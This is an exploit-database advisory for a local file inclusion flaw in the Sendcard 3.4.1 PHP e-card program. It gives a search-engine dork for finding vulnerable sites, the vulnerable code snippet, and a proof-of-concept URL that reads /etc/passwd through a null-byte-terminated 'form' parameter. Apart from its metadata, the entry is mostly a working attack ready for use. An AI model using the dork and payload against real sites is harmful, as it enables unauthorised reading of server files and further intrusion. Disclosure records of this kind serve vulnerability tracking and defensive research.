Sendcard 3.4.1 - 'sendcard.php?form' Local File Inclusion

Author: ettee
type: webapps
platform: php
port: 
date_added: 2007-04-30 
date_updated: 2016-09-30 
verified: 1 
codes: OSVDB-35738;CVE-2007-2471 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comsendcard_3-4-1.tar.gz

Sendcard  (sendcard.php) Sendcard Local File Inclusion Vulnerability

Discovered: ettee
Dork: "Powered by sendcard - an advanced PHP e-card program" -site:sendcard.org
         "powered by Sendcard"

Bug:
"// Get the template details
if(!isset($form) || $form == ''){
    $form = "form";
}
if(!isset($des) || $des == ''){
    $des = "card";
}
if (!isset($template) || $template == '') {
    $template = 'message';
}"

PoC:
http://[site]/[path]/sendcard.php?form=/etc/passwd%00

# milw0rm.com [2007-05-01]